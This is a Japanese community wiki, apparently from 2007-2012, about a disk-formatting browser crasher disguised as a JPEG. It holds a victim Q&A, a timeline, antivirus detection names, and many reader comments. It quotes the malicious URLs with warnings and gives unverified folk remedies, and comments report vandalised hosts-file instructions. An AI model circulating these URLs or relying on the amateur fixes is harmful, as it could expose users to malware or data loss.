HDDをフォーマットするブラクラ まとめwiki
http://w.atwiki.jp/burakura_hdd/
HDDをフォーマットするブラクラ まとめwiki
ja
2012-09-16T15:23:25+09:00
1347776605
-
Q&A
https://w.atwiki.jp/burakura_hdd/pages/16.html
''※問題の無い内容を何度も消す行為は悪質な荒らし行為になります'' プロバイダへの通報も考えますのでお控えください 言いたい事があるなら消さずに掲示板に書いてください。
ちなみに、愉快犯的にウイルスのURLを貼る行為も罰せられる可能性があります。
*Q. URLを開いてしまったけど大丈夫?
A. エロ画像が表示されただけなら大丈夫 ※クリックするとウイルス&ブラクラページへ移動する
ブラクラが発動しただけの場合、多分大丈夫
''※必ずスタートメニューの「スタートアップ」に変な物が無いか確認してください'' 何も無ければ大丈夫…の筈。さらに心配ならウイルススキャン+スタートアップの元ファイルを辿って
*Q. メールが送られてきた 怖い
A. ブラクラがメール編集画面を開いているだけです 貴方のメールアドレスは漏れていません
*Q. Macだけど大丈夫?
A. TR/Delwin というウイルス名からして恐らくWindowsでしか動作しないウイルス 多分大丈夫
*Q. 消えたファイルを復旧させたい
A. ホワイター(ファイルを消してしまうウイルス)の動作によっては、一部ファイルが救出可能かも知れません。
- DataRecovery http://www.vector.co.jp/soft/win95/util/se382922.html 無料
- 復元 http://www.vector.co.jp/soft/win95/util/se410717.html サンプル版は無料、機能制限有り
- Vectorで検索 http://search.vector.co.jp/search?query=%95%9C%8C%B3
////犯人特定とかはWIKIに書かないほうが良いと思うんでコメントアウトしておきます。////////
// ↑理由が不明です
// ↑犯人ぶっころがしたいとか犯罪っぽい書き込みがあるから
// ↑アホかw お前訴えられたくない犯人じゃね?
//*Q. 犯人が誰なのか知りたい 犯人訴えたい
//A. 「はだしのゲン」公式?サイトのアップローダに、このブラクラへジャンプするファイルがアップロードされました。
//[[残念ながら、既にIPのログは流れてしまっている様子//>http://www.gigigi.net/up/up_zuruzuru.log]]。
//別にアクセスログを3ヶ月保存しないといけない法律が有ったような気もするので、管理人に連絡する価値はあります。
ちなみに、愉快犯的にウイルスのURLを貼る行為も罰せられる可能性があります。
//↑重要なんでコメントアウト外しました。
*Q. JPEGファイルを開いただけでウイルスが発動した?
A. ちょっと違います。JPEGに偽装した、ただのHTML+JavaScriptです。IEがウンコなのでブラクラが盛大に発動するだけです。
但し、変な実行ファイル (list01.exe) を実行すると、一部ファイルが消えるようです。(確認済み、ホワイター。下記参照)(古いIEや、IEの設定によっては勝手にEXEファイルが実行されます。)
*Q. 上記のlist01.exeって??
A. 落としてみたところ自己解凍書庫のアイコンをしていますがアイコンを偽装した(アイコンを偽装したウイルスは多いので注意しよう。)単体exeです。
実行してみたところシステムの構成情報を削除されました。(つまり実行すると、再起動後起動しなくなります。)
*Q. どどどどどどどうしよ????
A. 落ち着きましょう。exeを実行してしまったのであれば、アンチウィルスソフトでPCをスキャンしましょう。
アンチウィルスが入っていなければ、AVG、avast等を使ってみるといいでしょう。
そして再起動や終了等はは絶対してはいけません。(PCが起動しなくなるから。)
ググレば詳しい解決策が載ってるはずです。
*Q. HDDがずっとゴリゴリ言っている
A. ファイル削除ウイルスが、HDD上のファイルを片っ端から上書きして使えなくしている可能性があります。タスクマネージャーを開いて、変なプロセスを全て殺してください。
(ユーザー名の所に自分のユーザー名が書いてあるプロセス)
*Q. 情報が錯綜していて把握できない
A. とりあえず不安だったらアンチウィルスソフトでPCをスキャンしましょう。
アンチウィルスが入っていなければ、AVG、avast等を使ってみるといいでしょう。
----
- PCフォーマットされた マジで犯人訴えたい 何処のどいつだよ -- 名無しさん (2007-12-31 03:08:18)
- はだしのゲンのアップローダー管理人に聞けばIP判るから、そこからISPに連絡して訴えればいい -- 名無しさん (2007-12-31 03:13:12)
- http://www.gigigi.net/up/up_zuruzuru.log 残念ながら、既にIPのログは流れてしまっている様子。別にアクセスログを3ヶ月保存しないといけない法律が有ったような気もするから、管理人に連絡する価値はあるが。 -- 名無しさん (2007-12-31 03:29:28)
- マンコ画像表示されちゃったんだが・・・オンラインスキャンは2ファイル感染とかいってる。エクスプローラ見ても感染ファイル見当たらないんだが結局どうすればいいんだろう? -- 名無しさん (2007-12-31 03:35:58)
- とりあえず''再起動、終了''するな。 -- 名無しさん (2007-12-31 03:38:11)
- 感染してたと思われるログファイルの1つを削除、もう一つはIE一時ファイルにあるようなので全部クリアしたんだがどうかな・・・終了できねえ・・・ -- 名無しさん (2007-12-31 03:44:19)
- 踏んじゃったんだがMacなら大丈夫なの?確かめる方法が無くてビビってるんだが -- 名無しさん (2007-12-31 03:45:12)
- ↑TR/Delwin というウイルス名からして恐らくWindowsでしか動作しないウイルス 多分大丈夫 -- 名無しさん (2007-12-31 03:50:45)
- http://kat.cc/30cf21 ←これを踏んでマンコ画像出ちゃったんだが・・・警告とか何も反応は無かった。 -- 名無しさん (2007-12-31 04:03:05)
- スタートアップにexeとかが入れられてなければ大丈夫ってことだよ・・・ね? -- 名無しさん (2007-12-31 04:06:43)
- プニルでJAVA切ってて、涙目偽装url踏んだけどセフセフ? -- dion軍 (2007-12-31 04:13:17)
- もう釣り宣言していいんじゃね? -- 名無しさん (2007-12-31 04:13:47)
- Opera最強www -- 名無しさん (2007-12-31 04:16:29)
- メニューのアンチウイルスソフト対応状況踏んだら、トロイ検出ってなった、なんかコエェ!! -- ヘタレ (2007-12-31 04:23:40)
- 最初、一部の釣りに腹を立てて内容を消したが、よく調べたらホワイターが含まれてるのは確かなんだな。正直、スマンカッタ。 -- 名無し (2007-12-31 04:42:59)
- 1回目のスキャンで引っかかったファイル削除して2回目終わったところでオンボロPCがフリーズ。覚悟決めて再起動。生還しました・・・ -- 名無しさん (2007-12-31 04:44:19)
- vistaでもかかるんですか? -- 名無しさん (2007-12-31 04:50:12)
- jane doeでそのURLを踏んだのですが、「decode不可 erorr」と表示されサイト移動はしませんでした。これは大丈夫なのでしょうか。 -- 名無しさん (2007-12-31 05:39:35)
- ↑問題ない -- 名無しさん (2007-12-31 06:18:22)
- Vista+IE7はバグによりバッチファイルを保存することができません。http://support.microsoft.com/kb/934817/ja -- 名無しさん (2007-12-31 06:25:53)
- 対策メニューにあるhostsファイルへの追加(編集)の仕方がわかりにくいです。メモ帳などエディタで開くとこまで行っても、不慣れな人はそこで詰まると思います。どなたかbefore->afterみたいに説明を足してもらえると助かります。 -- 名無しさん (2007-12-31 06:37:28)
- メニューの「有用と思われる書き込み」でNODが反応し表示しません。「BAT/DeltreeY.AN トロイの木馬 検出」だそうです。上記の「アンチウイルスソフト対応状況」は問題ありませんでした。すいません。 -- ヘタレ (2007-12-31 06:55:45)
- ↑2 全部作ってここからここまでコピペ、ってやってやらなきゃダメかね。 -- 名無しさん (2007-12-31 07:00:15)
- 踏んでしまったがOperaで無問題wwwwwwwwwww -- 名無しさん (2007-12-31 11:23:42)
- ↑4 改訂してみた。どうでしょう。 -- 名無しさん (2007-12-31 13:03:50)
- C:\WINDOWS\SYSTEM32\AUTOEXEC.NTha -- 名無しさん (2007-12-31 13:56:25)
- ↑書きかけでした… ↑のファイルの.txtがあるとまずいんですよね?C:\WINDOWS\SYSTEM32\AUTOEXEC.NTは普通ありますよね? -- 名無しさん (2007-12-31 13:57:40)
- 犯人が誰なのか(ry って項目消した方がいいと思う。まとめwikiに書くべきことじゃ無いよ。 -- 名無しさん (2007-12-31 14:06:15)
- .txtがあるのがまずいです。C:\WINDOWS\SYSTEM32\AUTOEXEC.NTは普通あります。問題無しです。 -- 名無しさん (2007-12-31 14:28:33)
- ↑5 GJです。後、上書き保存を忘れないよう書いておけば完璧だと思います。素早いご対応感謝します。 -- 名無しさん (2007-12-31 14:31:56)
- FORMATやDELTREEなどのコマンドをリネームするってのはどう? -- 名無しさん (2007-12-31 14:46:13)
- www.gigigi.net/up/img/1230.jpgはもう死んでるよね -- 名無しさん (2007-12-31 15:12:22)
- AVGやけに評価あるけど入れてたから大丈夫ですかね…踏んだけどブラクラ発動しませんでした。 -- 名無しさん (2007-12-31 15:23:34)
- 荒らし行為が酷い。荒らしのIPは履歴見ても分かるように「60.56.156.32」だからこいつ規制してくれ。それとトップページに問題の画像とファイルがアップされてるのも削除して、凍結するなりしてくれ。 -- 管理人対策してくれ (2007-12-31 16:52:52)
- Javaが入ってると駄目なんでしょうか?入ってなければもしクリックしてしまっても安全ですか? -- 名無しさん (2007-12-31 17:05:05)
- 名前は似ているが、JavaとJavaScriptは別物。 -- 名無しさん (2007-12-31 17:43:56)
- AVGは無料で優秀かつ、日本語に対応しているのがでかい 個人的オススメはAntiVir+BitDefenderコマンドライン版 -- 名無しさん (2007-12-31 17:49:58)
- JavaScriptのコードを読んだけど、日本語環境のWindows版Internet Explorerを標的にしたブラクラっぽい。 -- 名無しさん (2007-12-31 18:16:33)
- 再起動したら、起動しなくなってしまったパターンの場合、復帰できる手段はあるのでしょうか -- 名無しさん (2007-12-31 19:00:53)
- 左メニューの「対策」ページで、hostsファイルの編集内容が不正に改ざんされています。このままでは対策どころか、ウィルスによる被害を助長するので要注意。 -- 名無しさん (2007-12-31 22:18:28)
- Sleipnirならおk? -- 名無しさん (2007-12-31 22:28:41)
- ごめ、自己解決 -- 名無しさん (2007-12-31 22:38:38)
- 犯人云々のやつは何で削除したの?まとめwikiなんだから載せておいた方がいいと思うけど。 -- 名無しさん (2007-12-31 22:59:42)
- Jane Doe Styleのビューアで ttp://www.xxxpornbabesites.com/naughtyasiannymphos.com/tgps/06-p06-zsd/05.jpg をうっかり踏んだら例のエロ画像が表示されたんですけど画像が表示されただけなら大丈夫ですか? -- 名無しさん (2007-12-31 23:21:59)
- 外付けのHDDは大丈夫なの? -- 名無しさん (2008-01-01 00:54:10)
- A-Zドライブを検索してフォーマットするってどこかで読んだ気がする -- 名無しさん (2008-01-01 01:40:57)
- そういやlist01.exeってあったな。あれが諸悪の根源か。 -- 名無しさん (2008-01-01 08:01:11)
- 新年あけましてカワイソス -- 名無しさん (2008-01-01 09:22:59)
- もし終了させちゃったら -- 名無しさん (2008-01-01 11:59:24)
- 途中送信スマン もし終了させちゃったらセーフモードで起動してスタートアップの中身消せばOKなの? -- 名無しさん (2008-01-01 12:00:08)
- ブラクラ登録推奨ってのは1個1個コピペして線ブラに登録させないと駄目?janeのNGうんたら系のtxtでまとめて登録できる方法とかある? -- 名無しさん (2008-01-01 21:25:51)
- 右のメニューがアフィになってるな。またクズ管理者か -- 名無しさん (2008-01-02 05:46:28)
- Firefox -- 名無しさん (2008-01-02 08:15:24)
- Firefoxなら無問題。IEでネットサーフィンなんてとてもできないよ。怖くて。 -- 名無しさん (2008-01-02 08:16:41)
- アフィは印象悪いわぁ。善意ではなく金儲けだったのか、って感じだ。 -- 名無しさん (2008-01-02 08:17:47)
- 週一でバックアップとってるので問題無 -- 名無しさん (2008-01-02 10:44:40)
- 上にあるけど、hostsファイルの編集内容は今現在対策ページに書いてあるのでおk? -- 名無しさん (2008-01-02 15:53:22)
- 「URLから運営者情報を確認できる」でググると、INTERNET Watchの「aguse」の記事が見つかります。お試しを。 -- ななし (2008-01-02 17:17:09)
- サイトを見る前に、URLから運営者情報を確認できるサイトhttp://news20.2ch.net/test/read.cgi/news/1164969914/ -- ななし (2008-01-02 17:18:52)
- (2007/12/17) aguse.net → http://www.aguse.jp として正式に運用を再開しました。 お手数ですがブックマークの変更をお願いいたします。 -- ななし (2008-01-02 17:20:58)
- IEで開いて画像出たけどブラクラ発動しないでAVGが反応…スタートアップにも何もなかったけど大丈夫ですかね? -- 名無しさん (2008-01-02 19:48:48)
- Wikiって勝手にアフィつくんじゃねーの? -- 名無しさん (2008-01-02 21:51:54)
- htmlメールに載せられた亜種発生の可能性は?もしそんなの出たら壊滅的な打撃出ないか? -- 名無しさん (2008-01-03 03:04:46)
- w~gigigi.net/up/img/1230.jpgを踏んじゃったのですが404になってました。これでも感染してるのでしょうか?・・・ -- 名無しさん (2008-01-03 05:44:02)
- >>w~gigigi.net/up/img/1230.jpgを踏んじゃったのですがさん、「404はアクセス先のデータが存在しない」って意味なので大丈夫ですよ -- 名無しさん (2008-01-03 08:19:44)
- つ〜か、糞Windowsなんかやめれば? -- ななし (2008-01-03 10:20:47)
- だいたい、WindowsとIEのクソ仕様が問題なんだよ。もうWindows捨てるわ、マジで。PCも古いし。 -- 名無しさん (2008-01-03 11:48:44)
- アフィ印象悪いとかいってる人、嫉妬・ネタミ・ヒガミでしかないよ。オレだってそうするよ。もっとアフィリエイトの本質を勉強すべきではないかと。 -- 名無しさん (2008-01-03 11:50:12)
- Windowsが糞なわけじゃない。ブラクラ作ったやつとIEが糞なんだ。 -- あ (2008-01-03 12:17:43)
- アフィについてウダウダ言ってるヤツ。善意を強要するなよ。インドの乞食かお前らは。 -- 名無しさん (2008-01-03 12:36:15)
- 踏んだらパソコンの中保存してある画像消されてしまうんですよね? -- 名無し (2008-01-03 16:06:53)
- クソOS -- 名無し (2008-01-03 16:27:42)
- VISTA叩かれてて肩身の狭かった俺歓喜wwwww -- 名無しさん (2008-01-03 18:12:32)
- 素人多すぎワロタ -- 名無しさん (2008-01-03 20:22:03)
- MacOS X だけど、問題ないよね? -- 名無しさん (2008-01-04 12:30:50)
- 「有用と思われる書き込み」で反応するのはどういうこと?Operaで踏んだらNOD32が反応したんだけどアウト? -- 名無しさん (2008-01-05 00:31:03)
- この程度のアフィすら許せないって言うなら、テメーで好きな様にまとめサイト作ってな乞食野郎 -- 名無しさん (2008-01-05 00:40:58)
- VM壊れた -- as (2008-01-05 12:53:47)
- TOPページ対応方法、127.0.0.1が0.0.0.1になってるんだけど… -- 菜々子 (2008-01-05 14:47:07)
- 今さっき、ブラクラ踏んじまったー(泣)んでTELNETが200個ほど起動↓↓しかし、昨日TBNを見てからhosts弄ってて助かった。まじ冷や汗ものだぜ -- ギリセーフ (2008-01-06 03:08:35)
- とりあえず、ログインしないと編集できないようにすればいい。 -- でって言う (2008-01-06 17:21:07)
- とりあえず、ログインしないと編集できないようにすればいい。 -- でって言う (2008-01-06 17:21:27)
- ブラクラ作るひとってすごいよな -- 名無しさん (2008-01-07 16:49:18)
- 壮大でも無い釣りだったな -- 名無しさん (2008-01-12 05:01:25)
- こーゆー釣りは4月1日がふさわしいと思うんだが -- 名無しさん (2008-01-12 13:03:11)
- オレ、ルナスケ使ってるんだがスクリプトの実行とかをオフっといたら取りあえずOK? -- 名無しさん (2008-01-17 01:16:23)
- 釣りとか言ってる人はリンク踏んで確かめてみろって言いたい!! -- 名無しさん (2008-01-18 02:04:02)
- 誰だよ、圧縮したファイルにこのウイルスぶち込んだの!! 俺の3年分の魂が・・・ -- 名無しさん (2008-02-28 05:23:09)
- IE6SP1のインターネットオプションに拡張子ではなく何とかってのが見当たらないのですが -- 名無しさん (2008-04-19 02:55:43)
- ならIE6SP2から加わった設定なんじゃね?XPSP1や2kはIE6SP1だから、このトロイを防げないってことか -- 名無しさん (2008-04-30 02:43:39)
- さっき踏んだんだけどまだやばいかな? -- 名無しさん (2008-05-10 20:53:04)
- 超遅レス。↑ウイルススキャンしてみ -- タスポート (2008-11-25 20:23:22)
- 「有用だと思われる書き込み」のページを見ようとしたらavast!でトロイ検出しました。 -- 名無しさん (2010-12-31 18:30:45)
- 私の環境でも確認しましたが、それはページ内の書き込み(スクリプト・コードなど)を実行されるものと勘違いしてトロイ検出と言っているだけかと思われます。 -- 名無しさん (2011-08-23 11:28:07)
- wiiでいっても無害 -- 名無しさん (2011-09-24 04:54:24)
- 部落ら -- kd (2011-10-21 18:11:28)
- あ -- 名無しさん (2012-03-03 10:55:43)
- a -- a (2012-03-03 10:56:43)
- -- あ (2012-03-03 10:57:50)
- 終了と再起動はしないようにしましょう、ですって -- akinkusu (2012-09-16 15:23:25)
#comment
2012-09-16T15:23:25+09:00
1347776605
-
a
https://w.atwiki.jp/burakura_hdd/pages/18.html
a
2012-04-17T14:19:18+09:00
1334639958
-
メニュー2
https://w.atwiki.jp/burakura_hdd/pages/3.html
#amazon(B000BY6CUM,image)
&link(SANYO eneloop ニッケル水素充電器 単3計2個セット N-MDR02S ){http://www.amazon.co.jp/exec/obidos/ASIN/B000BY6CUM/nm07-22/ref=nosim}
大人気の充電式電池エネループが72%オフの激安価格で登場。充電器と単三電池2つのセットで今なら実売価格なんと890円。
**更新履歴
#recent(20)
2010-08-20T00:11:29+09:00
1282230689
-
アンチウイルスソフト対応状況
https://w.atwiki.jp/burakura_hdd/pages/12.html
2008年1月17日 7:30頃の状況(空欄は状況不明)
|ソフト|対応○×|詳しい内容|
|AntiVir|○|検出名:TR/Dldr.Agent.aqr.20|
|BitDefender| ×|Virus Signatures 972843の定義ファイルでは未対応を確認済|
|ノートン|○|検出名:Downloader(パターンファイル 2008.01.03.053で確認)|
|ウィルスバスター|○|検出名:JS_DLOADER.ZX(パターンファイル Ver.4.933で確認)|
|マカフィー| ×|パターンファイル Ver.5209.0000(2008/01/16)では未対応を確認済|
|カスペルスキー|○|検出名:Trojan-Downloader.JS.Agent.aqr|
|ウイルスキラー|○|検出名:Trojan.DL.Script.JS.Agent.lyx(?)|
|Windows Live|○|検出名:TrojanDownloader:JS/Agent.JG(?)|
|Live one care|○|検出名:TrojanDownloader:JS/Agent.JG|
|ウイルスセキュリティーZERO|||
|avast!|○|検出名:VBS:Malware-gen(080125-2)|
|AVG|○|検出名:Trojan horse Small.2.BJ|
|キングソフト| ×|パターンファイル 2008.01.16.17では未対応を確認済(検出名:JS.IeFrameT.bx?)|
|NOD32| ×|パターンファイル Ver.2799(20080116)では未対応を確認済(検出名:BAT/DeltreeY.AN?)|
|F-Secure|○|検出名:Trojan-Downloader.JS.Agent.aqr|
|G DATA|○|検出名:Trojan-Downloader.HTML.Agent.ir|
|Panda|○|検出名:Trj/Agent.HQI(VirusTotalの結果による)|
|ソフォス|○|検出名:Troj/Iframe-N|
|CA|○|検出名:JS/Snz.A|
注記)×が付いているソフトでも、トロイがダウンロードするウイルスは検出可能と思われるが、トロイ自体はブロックできないので注意が必要。
また、トロイがダウンロードするウイルスが、ダウンロードサイトの方で“既知のもの”→“未知のタイプ”に差し替えられた場合、
未対策だと即死する可能性もないわけではないので、注意は怠らないようにして下さい。
- 「有用と思われる書き込み」のページを開いたらNODが反応 -- 名無し (2007-12-31 04:47:33)
- 2chに書き込まれる「ラブレター」と同じ原理 無害 -- 名無しさん (2007-12-31 04:48:36)
- F-Secure Internet Secutiry 2007 でBAT/FORMATC.Hの名前での検出を確認(定義ファイルは2007-12-30_02)このサイトの「有用と思われる書き込み」で反応あり -- 名無しさん (2007-12-31 09:50:20)
- カスペルスキーはデータベースの日付 2007/12/31 6:49:50 で既に対応済み。検出名は Trojan-Downloader.JS.Agent.aqr。(何時対応したかまではわからないが、既に対応してる) -- K.Yz (2007-12-31 10:20:54)
- 上の表に対応した日付も書いて欲しい。各社の対応を見比べたい。 -- otsuka (2007-12-31 23:45:15)
- Antivirは検出名のTR/Dldr.Agent.aqr.20でVDFデータベースを検索すると2つ出てくるが、おそらく新しい方の07/12/31 15:34(日本時間)での対応と思われる -- 7氏 (2008-01-01 01:01:28)
- F-Secureの検出名、正しいものに直しました。データベース 2007-12-31_08での検出名です。 -- K.Yz (2008-01-01 04:23:54)
- マカフィーまだか・・・ -- 名無しさん (2008-01-01 04:50:45)
- Avastはパターンファイル更新された模様、対応してるか確認頼む -- 名無しさん (2008-01-01 08:07:28)
- ノートン先生マダー -- 名無しさん (2008-01-01 13:30:40)
- フリーに遅れを取る御三家(笑) -- 名無しさん (2008-01-01 14:41:42)
- Avastは12/31配信のパターンファイルでも検出できず。 -- Noname (2008-01-01 19:00:46)
- AntivirはTR/Delwinで検出されていたけど?複数ウイルスがある? もしかして新しく検出するようになったのはブラクラ? -- 名無しさん (2008-01-01 20:41:39)
- TR/DelwinでもAntivirのデータベースを検索したら、もっとも新しいのは2007/12/31 17:32のVDF7.00.01.179での対応ですね -- 7死 (2008-01-01 22:00:09)
- トレンドマイクロに検体を提出してあるが、年末年始の影響か対応が若干遅いのでしばらく時間がかかりそう -- 名無しさん (2008-01-02 01:52:08)
- http://www.virustotal.com/jp/ ではマイクロソフトも対応したという判定が出ましたが、LiveとOneCareの区別が付かないため両方に検出名を書いておきます。 -- 名無しさん (2008-01-02 07:00:56)
- avastは昨日付けでまたVPSアップデート、対応しているのやら。 -- 名無しさん (2008-01-02 13:00:36)
- 既に沈静化ってことは、上記の全ソフトが対応したってこと? -- 名無しさん (2008-01-02 20:38:54)
- ばすたーマダー? -- 名無しさん (2008-01-02 21:23:59)
- 沈静化っても、トロイがダウンロードするはずのウイルスがサイトから削除された(だからトロイが動作していないように見える)だけで、いつ復活するかもわからんから油断は禁物。 -- K.Yz (2008-01-02 22:06:41)
- ここに載ってるアンチウイルスソフトが掲載されているウイルスを検出していれば被害はないんですか? -- 名無しさん (2008-01-03 08:28:12)
- バスターまだなのか・・・終わってるな -- ありゃりゃ (2008-01-03 21:45:12)
- 有用と思われる書き込みでNOD32以下を検出、検出名BAT/Deltree.AN トロイ -- 名無しさん (2008-01-03 23:26:56)
- カスペルスキーの対処速度は異常w -- 名無しさん (2008-01-04 02:35:10)
- AVG、ソフォス、Microsoftでは同名だが、AntiVirでHTML/IFrame.abc、KasperskyでTrojan-Downloader.HTML.Agent.irと検出されるtane_uljp00206.jpgの方はSymantec(更新日1/4)もDownloaderとして検出するようです。NOD32は2764でもまだです(00206の方)。1230は持ってない。 -- 名無しさん (2008-01-04 11:30:39)
- ええい、CAはまだかぁ! -- 名無しさん (2008-01-04 15:49:12)
- ウイルスキラー2007で「Trojan.DL.Script.JS.Agent.lyx」が 19.56.40(1/4更新)できたけどこれかな? -- 名無しさん (2008-01-04 18:32:50)
- Wine上だとどうなるんだろ。たとえばies4linuxとか -- 名無しさん (2008-01-04 18:37:41)
- CAで12/31検出しました。 JS/Snz.Aというトロイの木馬で検出。報告遅くなりました、名無しさん。 -- CA (2008-01-04 20:02:41)
- 検体を再度virustotalで確認してみたが、AVGは検出しなくなってるんだが -- 名無しさん (2008-01-04 21:10:09)
- すまん、AVGはLHA形式だとスルーするからだ。よって検出しないんじゃなかった。 -- 名無しさん (2008-01-04 21:23:51)
- 確定した範囲で訂正しました。2008/1/4 22:00時点、NAV2008の対応はこちらでも確認。バスター,NOD32,キング,avastの未対応も確認。 -- K.Yz (2008-01-04 22:50:52)
- マカフィーも体験版試しましたが、対応してませんねぇ。今の所、御三家ではノートンだけが対応してるみたいです。 -- K.Yz (2008-01-05 00:24:04)
- bitdefender、コマンドライン版だけど1/4 19:35:47版の定義ファイルでは未対応。GUI版v10は未確認 -- 名無しさん (2008-01-05 02:55:27)
- ウィルスバスターもマカフィーもたるんでるなぁ -- 名無しさん (2008-01-05 05:23:45)
- バスターはともかくマカフィーもか。もうマカフィーもだめぽ -- 名無しさん (2008-01-05 09:18:59)
- 利用するブラウザやブラウザ設定で避けようがある脅威なので話題性ではなく重要性は他に比べて低いのかも?検体も送り年末から割と更新してるが未だに検出せず。NOD32、2766。tane_uljp00206.jpgの方だけどね。 -- 名無しさん (2008-01-05 10:10:04)
- 鯖の設定にもよるので、脅威としては低めだと思う。ただ対応は早くしてほしいものだが。 -- 名無しさん (2008-01-05 18:31:15)
- 2008/1/5 21:00時点の情報に直しました。バスターはパターンファイル更新はなかった模様。avast等は更新ありましたが、未対応のまま。ZEROは体験版無いので報告待ち。 -- K.Yz (2008-01-05 21:26:29)
- バスター、日本産ウィルスの対応が早いと思ったから購入したのに、こりゃダメだな・・・ -- 名無しさん (2008-01-06 00:01:21)
- アクセスしたらDownloaderがすごい勢いで検出されまくり(´・ω・`) 35個ぐらい検出、1秒に2~3回ほどorz 自動リロードなのかな? それに俺だけアクセスしても何も表示されなかった・・・byVistaノートン -- 名無しさん (2008-01-06 03:07:06)
- このブラクラ自体は日本産なのかどうかは不明だけど…。 -- 名無しさん (2008-01-07 14:00:38)
- バスターは基本的に土日はパッチが来ないからな・・・。今日来たやつで対応されていればいいけど -- 名無しさん (2008-01-07 16:36:08)
- 未対応ソフトの確認結果を更新しました。未対応組、もう対応する気無しですかねぇ。 で、しばらくアクセスできないんで、手の空いてる方は状況に変化があったら更新して下さい。 -- K.Yz (2008-01-08 01:57:18)
- http://internet.watch.impress.co.jp/cda/news/2008/01/07/18052.html 最新パターンでバスターも対応しているらしいが、931では偽装jpgを検出せず -- 名無しさん (2008-01-08 06:30:39)
- ↑のリンクを読み直したけど、ノートンとバスターはバッチファイルを検出対応ってことかな。 -- 名無しさん (2008-01-08 06:32:37)
- っぽいね。そうすると調べてくれてる人はスクリプト自体で確かめてるってことか? -- 名無しさん (2008-01-08 08:58:13)
- ウイルスセキュリティーZEROはパターンのアップデートがありましたが対応してるか否かは不明です。 -- 名無しさん (2008-01-08 18:13:40)
- ウイルスバスターはJS_DLOADER.ZXで偽装jpgを検出するようになりました。それにしても対応遅すぎ…。 -- 名無しさん (2008-01-09 00:41:09)
- バスターは日付みると8日に対応かな。カスペに勝てとは言わないからノートンは出し抜け。トレンドラボはどーしたっ。 -- 名無しさん (2008-01-09 10:07:38)
- このページ、更新して~ww -- 名無しさん (2008-01-11 08:24:25)
- わかる範囲で直しました。遅くなりましたが、バスターの対応はこちらでも確認済みです。それから、私の方の仮想環境では、キングは最初のトロイ(1230.jpg)をトロイとして検知しません(スルーします)。この辺は、NODと同じ状況? -- K.Yz (2008-01-11 23:47:37)
- 転送アドレス踏んだけどエロ画像出ただけだった件 -- bySleipnir1.66(非gekko) (2008-01-12 01:36:05)
- マカフィー未対応。通報して来ました。 -- 名無しさん (2008-01-12 10:22:26)
- avast対応遅すぎだろw -- 名無しさん (2008-01-12 15:19:26)
- NODいつ対応するのカナ・・・弱小は辛い -- 名無しさん (2008-01-12 15:37:12)
- カスペはポップアップブロックが出てウイルスが無効化される。バグかな。 -- 名無しさん (2008-01-12 22:53:18)
- avastやる気ねー\(^o^)/ -- 名無しさん (2008-01-13 18:14:53)
- avast!まだかぁー!? -- 名無しさん (2008-01-13 18:47:04)
- Norman Virus Control 5.70.01 1230.htm JS/Agent.Cでnormanも検出確認 -- 名無しさん (2008-01-13 21:22:25)
- まぁavastは無料だからまだいい。マカフィーは客から金取っておいてこの糞対応はなんだ。サポートも無いに等しいし他のに乗り換えるわ -- 名無しさん (2008-01-14 04:41:38)
- ウイルスセキュリティで試すツワモノはいないのかw -- 名無しさん (2008-01-14 11:27:16)
- avastは1月14日付けで更新ファイルでましたよ。確認お願いします。 -- 名無しさん (2008-01-14 18:38:54)
- 現時点で危ないサイトはありますか。 -- 名無しさん (2008-01-17 11:40:38)
- キングソフト、、、、 -- 名無しさん (2008-01-17 12:27:15)
- ウィルスセキュリティ… -- 名無しさん (2008-01-18 00:08:52)
- avastやる気無いのかな、、、 -- 名無しさん (2008-01-20 17:10:23)
- bitdefender コマンドライン版、1/20 15:08:31のシグネチャ892244で、偽装jpg未対応を確認。GUI版は不明 -- 名無しさん (2008-01-20 22:24:18)
- avastまだかー -- 名無しさん (2008-01-24 09:55:12)
- ↑検証されて無いだけじゃね? -- 名無しさん (2008-01-25 17:05:33)
- ウィルスセキュリティ放置wwwwww -- 名無しさん (2008-01-27 01:45:57)
- ウイルスチェイサーはまだか? -- 名無しさん (2008-01-31 00:16:51)
- 該当ファイル消しちまった…。誰か持ってる人、VirusTotalに投げて一覧を更新してくれるとうれしい -- 名無しさん (2008-01-31 11:13:35)
- は??一ヶ月以上たって、マカフィーまだなの??誰か通報しろや -- 名無しさん (2008-02-01 19:06:51)
- マカフィーまだですか? -- 名無しさん (2008-02-02 18:49:13)
- キングー -- 名無しさん (2008-02-04 15:45:28)
- ウィルスセキュリティwwwwwwwwwwwwwwwwww -- 4 (2008-02-10 00:56:21)
- カスペルスキー早すぎだろw自分で蒔いたんじゃネーノ? -- 名無しさん (2008-02-10 00:59:52)
- メニューの有用と思われる書き込み をクリックしたらNODがウィルス検出したって言ってきた!びびったw -- 今さら (2008-09-12 10:27:08)
- ↑やっぱり反応したかlol -- 名無しさん (2008-12-15 20:32:42)
#comment
2009-06-07T13:42:54+09:00
1244349774
-
トップページ
https://w.atwiki.jp/burakura_hdd/pages/1.html
パソコンに詳しくない方は、スレッドに書かれる対応策を鵜呑みにせず
冷静な行動を取りましょう。報告にも偽のものがあるようなので注意。
感染した恐れのある場合は再起動やシャットダウンをしてはいけません。
各スレで人柱による対策が検討されています。
とにかく&bold(){PCをそのままの状態}にしておきましょう。
普段からセキュリティに気を付けている方であればまず大丈夫です。
&u(){}&u(){早くも様々な場所で広まっています。無闇に画像やアドレスをクリックしないように十分に注意してください。}
*概要まとめ
+2007/12/28(金)、gigigi(アップローダー)にてエロ画像がUPされる。
(初出は http://sakura01.bbspink.com/test/read.cgi/ascii/1198102303/701 の模様。)
+2007/12/30(日)Download板にて報告、ニュース速報板にスレが立ち拡大中。AV監督(愛媛県)
+画像は拡張子はjpgだが、中身はHTMLとJavaScriptであり、これをクリックするとブラクラが発動、最終的にデスクトップにbatファイルをDLさせる。
+再起動した瞬間に発動し、強制的にHDDをフォーマットする。
+専用ブラウザの画像表示機能はIEコンポーネントを利用していてもIMGタグを利用したものなら安全。具体的には、ギコナビやLive2chや壺の画像プレビュー機能等なら×が表示されるだけで、ブラクラは実行されないので安全。ただ、当然クリックしてIE等Webブラウザで開いた場合は、専用ブラウザは関係なくなるので注意が必要。
*下記URLを踏むと大変危険です絶対にアクセスしないでください
>243 名前: AV監督(愛媛県)[] 投稿日:2007/12/30(日) 21:18:08.35 ID:X08PgMDX0
>スレタイ:【ブラクラ】HDDをフォーマットするWebサイト登場【ウイルス】
>本文:
>132[名無し]さん(bin+cue).rar [sage] 2007/12/30(日) 21:04:24 ID:ZdkjaBJz0 (PC)
>www.gigigi.net/up/img/1230.jpg
>相当やばいサイト発見(´・ω・) ス
>
